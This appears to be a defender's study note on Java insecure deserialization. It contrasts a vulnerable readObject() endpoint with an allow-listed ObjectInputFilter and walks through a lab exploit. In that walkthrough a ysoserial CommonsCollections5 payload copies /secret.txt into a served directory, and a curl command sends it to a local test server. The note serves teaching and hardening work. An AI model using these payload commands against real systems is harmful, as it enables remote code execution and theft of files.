Defender's Notes
Insecure Deserialization

Insecure deserialization occurs wherever an application turns bytes it received from the client back into live objects without validating them first. Any language or framework with a serialization mechanism is exposed; it is most commonly seen in Java, but .NET, PHP, Ruby and Python are affected as well.

Serialization is the process of converting the variables and objects in a process's memory into a format (a stream of bytes) that can be stored or transmitted.

Deserialization is the reverse: converting that stream of bytes back into an object in the memory of the current process.

When the serialized object is handed to the client (in a cookie, a hidden form field, a request parameter) the attacker controls it. A serialized object is just a byte representation of the object: as long as we know how to parse (and modify) the format, nothing prevents us from changing fields and sending it back. Java streams are easy to spot: the raw bytes start with AC ED 00 05, and the base64-encoded form starts with rO0AB.

Technologies that rely on serialization:

  • Remote Method Invocation (RMI)

  • Java Management Extension (JMX)

  • Java Message Service (JMS)

  • Java Server Faces implementation (ViewState)

Custom protocol implementation, the vulnerable pattern (request bytes go straight into readObject() with no filter or allow-list):

InputStream is = request.getInputStream();
ObjectInputStream ois = new ObjectInputStream(is);
ois.readObject();  // any Serializable class on the classpath can be instantiated here
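The vulnerable pattern beside its hardened form, as an added example that is not code from the original notes: readUnsafe() is the pattern above, readSafe() attaches a JEP 290 ObjectInputFilter (Java 9 and later) that allows only the one class the endpoint expects, rejects everything else, and caps stream depth and size. The DeserDemo and Session classes are my own stand-ins for an application type; main() shows the filter accepting a Session and rejecting a HashMap.

```java
import java.io.*;

// Added example: unfiltered readObject() next to an allow-listed ObjectInputFilter.
public class DeserDemo {

    // Hypothetical application class the endpoint legitimately expects.
    static class Session implements Serializable {
        private static final long serialVersionUID = 1L;
        String user;
        boolean admin;
        Session(String user, boolean admin) { this.user = user; this.admin = admin; }
    }

    // VULNERABLE: every Serializable class on the classpath is fair game, so a
    // ysoserial gadget chain is just another byte stream to this method.
    static Object readUnsafe(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            return ois.readObject();
        }
    }

    // HARDENED: allow only the expected class ("DeserDemo$Session"), reject all
    // others ("!*"), and bound depth and size so a crafted stream cannot exhaust
    // memory before the class check even runs.
    static Object readSafe(byte[] data) throws IOException, ClassNotFoundException {
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
            "DeserDemo$Session;!*;maxdepth=5;maxbytes=4096");
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(filter);
            return ois.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        byte[] expected = serialize(new Session("alice", false));
        byte[] unexpected = serialize(new java.util.HashMap<String, String>());

        System.out.println("unsafe, HashMap accepted: " + readUnsafe(unexpected).getClass().getName());
        System.out.println("safe, Session accepted:   " + ((Session) readSafe(expected)).user);
        try {
            readSafe(unexpected);
            System.out.println("safe, HashMap accepted (filter not applied?)");
        } catch (InvalidClassException e) {
            System.out.println("safe, HashMap rejected:   " + e.getMessage());
        }
    }
}
```

The rejection surfaces as an InvalidClassException with a "filter status: REJECTED" message before any HashMap is built, which is the property that matters: gadget chains run inside readObject(), so the check has to happen before the class is resolved, not after. The same pattern string can be applied process-wide with the jdk.serialFilter system property (-Djdk.serialFilter=...) when the code that calls readObject() cannot be changed.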

Exploitation

Two main outcomes:

  • Tampering: change sensitive fields carried in the serialized object (role, user id, price, file path) and send it back; the application trusts the result because it never validates data that arrives in its own format.

  • Remote code execution: send a gadget chain, a serialized graph of classes already on the application's classpath whose readObject() or other deserialization callbacks end up executing an attacker-chosen command while the stream is still being read.

Using the ysoserial tool

ysoserial generates gadget-chain payloads for common libraries; the payload name selects the library and chain (for example CommonsCollections5 for Apache Commons Collections 3.x), and the command is what the chain executes on the target:

java -jar ysoserial.jar [payload] '[command]'

Example

Generate the payload, then base64-encode it without line wraps (GNU base64 -w 0), since a wrapped value would break the request parameter:

java -jar /usr/local/bin/ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cp /secret.txt /opt/app/files/dummy.html' > deser.obj
base64 -w 0 deser.obj > deser.b64

Send it in the parameter the application deserializes (obj here), with a valid session cookie:

curl -v --cookie SID=12345 --data-urlencode "obj=$(cat deser.b64)" http://172.17.0.2:8080/API

The command runs with the privileges of the application server; here it copies a file into /opt/app/files so the result can be read back over HTTP if that directory is served. A 500 response or a changed response time after sending the payload is a common sign the chain fired even when the command has no directly visible effect.

Tools: ysoserial

Resources

  • GrrrDog/Java-Deserialization-Cheat-Sheet, a cheat sheet about Java deserialization vulnerabilities: https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet